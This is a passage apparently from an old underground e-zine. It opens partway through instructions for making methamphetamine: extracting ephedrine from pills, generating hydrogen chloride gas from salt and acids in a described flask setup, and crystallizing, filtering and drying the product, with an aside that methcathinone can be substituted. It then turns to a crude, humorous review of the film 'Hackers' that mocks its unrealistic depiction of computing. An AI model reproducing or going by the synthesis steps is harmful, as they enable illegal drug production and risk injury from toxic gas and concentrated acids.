pill sludge is poured into the filter, and the water it contains is allowed to filter through. It too should be absolutely clear, and should be mixed in with the first extract. A little water may be poured over the top of the filler sludge to get the last of the ephedrine out of it. This sludge should be nearly tasteless, and gritty in texture. The water extract should taste very bitter, as it contains the ephedrine. The filtered water is now returned to the stove burner, and half of the water it contains is gently boiled away. Once this much water has been boiled off, precautions should be taken to avoid burning the ephedrine. The best alternative is to evaporate the water off under a vacuum. If this is not practical with the equipment on hand, the water may be poured into a glass baking dish. This dish is then put into the oven with the door cracked open, and the lowest heat applied. In no time at all, dry crystals of ephedrine HCl can be scraped out of the baking dish with a razor blade. The serious kitchen experimenter may wish to further dry them in a microwave. Chapter 5 (The part about the HCl gas) A source of anhydrous hydrogen chloride gas is now needed. The chemist will generate his own. The glassware is set up as in Figure 1. He will have to bend another piece of glass tubing to the shape shown. It should start out about 18 inches long. One end of it should be pushed through a one hole stopper. A 125 mL sep funnel is the best size. The stoppers and joints must be tight, since pressure must develop inside this flask to force the hydrogen chloride gas out through the tubing as it is generated. Into the 1000 mL, three-necked flask is placed 200 grams of table salt. Then 25% concentrated hydrochloric acid is added to this flask until it reaches the level shown in the figure. The hydrochloric acid must be of laboratory grade [I use regular muriatic acid for pools]. Figure 1: \ / \ /ķ ֽ ӷ <--125 mL separatory funnel ӷ ֽ ķ Ľ glass tubing Ŀ ӷ ֽ  ͻ stopcock->ۺĴ Salt and Hydrochloric acid stopper ->ķ \/з ķ <-1 hole mixed into a paste by add- ĺ ĺ stopper ing HCL to salt and mixing. Ľ Ľ Ľ ķ The surface should be rough ֽ ӷ and a good number of holes should be poked into the 1000 mL, 3 neck flask paste for long lasting generation of HCl gas. ӷ acid/salt level ֽ ķ Ľ ķ Ľ ķ Ľ Ľ Some concentrated sulfuric acid (96-98%) is put into the sep funnel and the spigot turned so that 1 mL of concentrated sulfuric acid flows into the flask. It dehydrates the hydrochloric acid and produces hydrogen chloride gas. This gas is then forced by pressure through the glass tubing. One of the Erlenmeyer flasks containing methamphetamine in solvent is placed so that the glass tubing extends into the methamphetamine, almost reaching the bottom of the flask. Dripping in more sulfuric acid as needed keeps the flow of gas going to the methamphetamine. If the flow if gas is not maintained, the methamphetamine may solidify inside the glass tubing, plugging it up. Within a minute of bubbling, white crystals begin to appear in the solution, More and more of them appear as the process continues. It is an awe-inspiring sight. In a few minutes, the solution becomes as thick as watery oatmeal. It is now time to filter out the crystals, which is a two man job. The flask with the crystals in it is removed from the HCl source and temporarily set aside. The three-necked flask is swirled a little to spread around the sulfuric acid and then the other Erlenmeyer flask is subjected to a bubbling with HCl. While this flask is being bubbled, the crystals already in the other flask are filtered out. The filtering flask and Buchner funnel are set up as shown in figure 2. The drain stem of the buchner funnel extends all the way through the rubber stopper, because methamphetamine has a nasty tendency to dissolve rubber stoppers. This would color the product black. A piece of filter paper covers the flat bottom of the Buchner funnel. The vacuum is turned on and the hose attached to the vacuum nipple. Then the crystals are poured into the Buchner funnel. The solvent and uncrystallized methamphetamine pass through the filter paper and the crystals stay in the Buchner funnel as a solid cake. About 15 mL of solvent is poured into the Erlenmeyer flask. the top of the flask is covered with the palm and it is shaken to suspend the crystals left clinging to the sides. This is also poured into the Buchner funnel. Finally, another 15 mL of solvent is poured over the top of the filter cake. Figure 2: Ŀ <-Bchner Funnel ___________ \ / \ / \ / Ŀ <--To vacuum Ŀ Ŀ Filtering flask--> Now the vacuum hose is disconnected and the Buchner funnel, stopper and all, is pulled from the filtering flask. All of the filtered solvent is poured back into the erlenmeyer flask it came from. It is returned to the HCl source for more bubbling. The Buchner funnel is put back into the top of the filtering flask. It still contains the filter cake of methamphetamine crystals. It will now be dried out a little bit. The vacuum is turned back on, the vacuum hose is attached to the filtering flask, and the top of the Buchner funnel is covered with the palm or section of latex rubber glove. The vacuum builds and removes most of the solvent from the filter cake. This takes about 60 seconds. The filter cake can now be dumped out onto a glass or China plate (not plastic) by tipping the Buchner funnel upside-down and tapping it gently on the plate. And so, the filtering process continues, one flask being filtered while the other one is being bubbled with HCl. Solvent is added to the Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each flask has been bubbled for about seven times, no more crystal will come out and the underground chemist is finished. If ether was used as the solvent, the filter cakes on the plates will be nearly dry now. With a knife from the silverware drawer, the cakes are cut into eighths. They are allowed to dry out some more then chopped up into powder. If benzene was used, this process takes longer. Heat lamps may be used to speed up this drying, but no stronger heat source. [The above section of chapter 5 is talking about methamphetamine. You could, in most instances, substitute the word methcathinone, but I wanted to present the text to you in its exact form.] ------------------------------------------------------------------------------ Review of "HACKERS" By Wile Coyote Sorry, it might be a little long... cut it to ribbons if you want, most of it is just a rant anyway... Hope you enjoy it. First off, I have to admit that I was biased going into the movie "Hackers"... I heard that it wasn't going to be up to snuff, but did I let that stop me? No, of course not... I sucked up enough courage to stride towards my girlfriend and beg for seven bucks... :) She ended up wanting to see the movie herself (and sadly, she rather enjoyed it... oh, well, what can you do with the computer illiterate or is it the computer illegitimate?). Now onto.... THE MOVIE (Yes, I AM going to give you a second-by-second playback of the movie... you don't want me to spoil the plot, you say? Well, don't worry, there is no plot to spoil! :) just kidding, go see it... maybe you'll like it...) Well, from the very first few seconds, I was unimpressed... It begins with an FBI raid on some unsuspecting loose (who turns out to be the main character, but that's later) named Zero Cool (can you say "EL1EEEEET WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey, cinematography counts!) But, the acting was worse. The Feds bust into this home and run up the stairs, all while this lady (the mom) just kind of looks on dumbfounded and keeps saying stuff like "hey, stop that...", or something (is this what a raid is like? I've never had the pleasure...) Ok, so the story goes on like this: The 11 year old kid made a computer virus that he uploads to, I think, the NY stock exchange, and it crashes 1,507 computers. There is a really lame court scene where the kid is sentenced to 7 years probation where he can't use a computer or a touch-tone phone... That was 1988... Time passes... Now it's 1995, and boy have things changed (except the mom... hmmm....). Now the ex-hacker is allowed to use a computer (his 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) boxing some TV station to change the program on television (yes, I know that all of you super-el33t hackers hack into TV stations when you don't like what's on Ricki Lake!). N-e-way, while hacking into their super-funky system (the screen just kind of has numbers moving up and down the screen like some kind of hex-editor on acid...) he gets into a "hacking battle" with some other hacker called Acid Burn (I don't think I have ever seen such a trippy view of the "Internet"... lots of Very high-end graphics, not very realistic, but it's Hollywood...). In the end, the other hacker kicks the shit out of him (he has changed his handle to Crash Override now, just to be cool, i guess) and logs him off the TV station. Wow, tense... cough... For those of you who care, let me describe the "hacker" Crash Override: He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is (kinda) built, and wears VERY wicky (wicky : weird plus wacky) clothes, and the CDC might have quite a bit to say about the amount of leather he wears... I mean, there are limits to that kind of stuff, man! And to top off his coolness, he is, like, the roller-blade king of the world. (Not that hackers don't roller-blade, but he does it just Soooo much cooler than I could... :) ). And yet, here's the nifty part, despite all of his deft coolness, he couldn't get a girl for the life of him (we all morn for him in silent prayer). Ok, so now Crash is at school, and he meets Wonderchick (who is EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to spoil the suspense). Now, while at school, he wants to hook up with wonderchick, so he breaks into the school's computer (it must be a fucking Cray to support all of the high-end-type graphics that this dude is pulling up) and gets his English(?) class changed to hers. So, some other super-d00dcool hacker spots him playing around with the schools computer (it's funny how may elite hackers one can meet in a new york public school...), so he catches up with Crash and invites you to an elite (Oh, if you ever want to see a movie where the word 3l333333333t is used, like a fucking million times, then go see Hackers...) hackerz-only club, complete with million-dollar virtual-reality crap and even a token phreaker trying to red-box a pay-phone with a cassette recorder (never mind that the music is about 197 decibels, the phone can still pick up the box tones...). What follows is that Crash meets up with some seriously k-rad hackers (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and Phantom Phreak : who reminds of that gay kid on "my so called life... maybe that was him?";Lord Nikon : the token black hacker... Photographic memory is his super-power). They talk about k00l pseudo-hacker shit and then a l00ser warez-type guy comes up and tries to be El33t like everybody else. He is just about the ONLY realistic character in the whole movie. He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps saying "I need a handle, then I'll be el33t!". (Why he can't just pick his own handle, like The Avenging Turd or something, is beyond me... He plays lamer better than the kids in Might Morphin Power Rangers... awesome actor!). N-e-way, this is where the major discrepancies start. Ok, first they try to "test" Lamerboy by asking him what the four most used passwords are. According to the movie, they are "love, sex, god, and secret". (Hmmmm.... I thought Unix required a 6-8 char. password....). Somehow lamerboy got into a bank and screwed with an ATM machine four states away; all of the hacker chastise him for being stupid and hacking at home (If you watch the movie, you'll notice that the hackers use just about every pay-phone in the city to do their hacking, no, THAT doesn't look suspicious)Next they talk about "hacking a Gibson". (I was informed that they WANTED to use "hacking a Cray", but the Cray people decided that they didn't want THAT kind of publicity. I've never heard of a Gibson in real life, though...). They talk about how k-powerful the security is on a Gibson, and they say that if Lamerboy can crack one, then he gets to be elite. Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy finally cracks a Gibson with the password God (never mind a Login name or anything that cool). Then the cheese begins in full force. The Gibson is like a total virtual-reality thingy. Complete with all sorts of cool looking towers and neon lightning bolts and stuff. Lamerboy hacks into a garbage file (did I mention that the entire world is populated by Macs? Oh, I didn't... well, hold on :)...). So, this sets alarms off all over the place (cause a top-secret file is hidden in the garbage, see?), and the main bad-guy, security chief Weasel, heads out to catch him. He plays around with some neon, star-trek-console, buttons for a while, then calls the "feds" to put a trace on the kid. La de da, ess catches him in a second, and the kid only gets half of the file, which he hides. (to spoil the suspense, yet again, the file is some kind of money getting program, like the kind some LOD members wrote about a long time ago in Phrack, which pulls money from each transaction and puts it into a different account. Needless to say, the Security Weasel is the guy who wrote it, which is why he needs it back, pronto!). As we travel along the movie, the hackers keep getting busted for tapping into the Gibson, and they keep getting away. The "action" heats up when Wonderchick and Crash get into a tiff and they decide to have a hacking contest... They go all over the city trying their best to fuck with the one fed they don't like.... Brilliant move, eh? The movie kind of reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop. They all fondle over the machine with the same intensity that Captain Kirk gave to fighting Klingons, and frankly, their acting abilities seems to ask "please deposit thirty-five cents for the next three minutes". It was funny listening to the actors, 'cause they didn't know shit about what they were saying... Here's a clip: Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not Kbps, mind you :)...I wonder where they designed a .8 of a bit?) Yeah! Cool... Hey what kind of chip does it have in it? A P6! Three times faster than a Pentium.... Yep, RISC is the wave of the future... (I laughed so hard..... Ok, first of all, it is a Mac. Trust me, it has the little apple on the cover. Second it has a P6, what server she ripped this out of, I dare not ask. How she got that bastard into a laptop without causing the casing to begin melting is yet another problem... those get very hot, i just read about them in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6, because it has RISC coding.... I kinda wished I had stayed for the credits to see the line: Technical advisor None.... died on route to work...) Finally they ask something about the screen, and they find out it is an..... hold your breath.... ACTIVE MATRIX! ... Kick ass! They do lots of nifty things with their magic laptops (I noticed that they ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say you can't hack on a mac, 'cause really you can hack on a TI-81 if you've got the know.... but please, not EVERYONE in the fucking movie has to have the exact same computer (different colors, though... there was a really cool clear one).... it got really sad at the end), and they finally find out what the garbage file that Lamerboy stole was, this time using a hex editor/CAD program of some sort. As we reach the end of the movie, the hackers enlist the help of two very strangely painted phone phreaks who give the advice to the hackers to send a message to all of the hackers on the 'net, and together, they all kicked some serious ass with the super-nifty-virtual-reality Gibson. In the end, all of the Hackers get caught except for one, who pirates all of the TV station in the world and gives the police the "real" story... So, the police politely let them go, no need for actually proving that the evidence was real or anything, of course. So, in the end, I had to say that the movie was very lacking. It seemed to be more of a Hollywood-type flashy movie, than an actual documentary about hackers. Yes, I know an ACTUAL movie about hacker would suck, but PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It may have sucked less if they didn't put flashing, 64 million color, fully-rendered, magically delicious pictures floating all over the screen instead of just a simple "# " prompt at the bottom. With all of the super-easy access to all of the worlds computers, as depicted in the movie, ANYBODY can be a hacker, regardless of knowledge, commitment, or just plain common sense. And that's what really made it suck... Hope you enjoyed my review of HACKERS!